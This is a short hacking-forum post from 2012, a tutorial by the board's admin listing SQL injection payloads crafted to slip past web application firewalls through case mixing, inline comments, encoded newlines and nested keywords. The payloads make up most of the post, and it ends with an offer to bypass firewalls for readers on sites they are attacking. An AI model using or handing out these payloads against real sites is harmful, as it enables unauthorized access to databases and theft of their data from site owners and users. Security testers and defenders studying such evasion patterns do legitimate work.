EXPERTS AND PROFESSIONALS ONLY!


    [TUT] Sql Injections Web Application Firewalls Bypasses

    Share

    zeusk
    Admin

    Posts : 144
    Join date : 2011-12-04

    [TUT] Sql Injections Web Application Firewalls Bypasses

    Post  zeusk on Sun Jul 08, 2012 4:37 pm

    I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

    Sql Injections WAF bypass methods

    1) id=1+UnIoN+SeLecT 1,2,3—

    2) id=1+UnIOn/**/SeLect 1,2,3—

    3) id=1+UNIunionON+SELselectECT 1,2,3—

    4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—

    5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—

    6) id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—

    7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3—

    8 ) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3—

    /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3--

    9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3—


    If you are injecting any site and find some complicated WAF please post here or PM me the link and I will try to bypass it for you.

      Current date/time is Sun Dec 11, 2016 11:48 am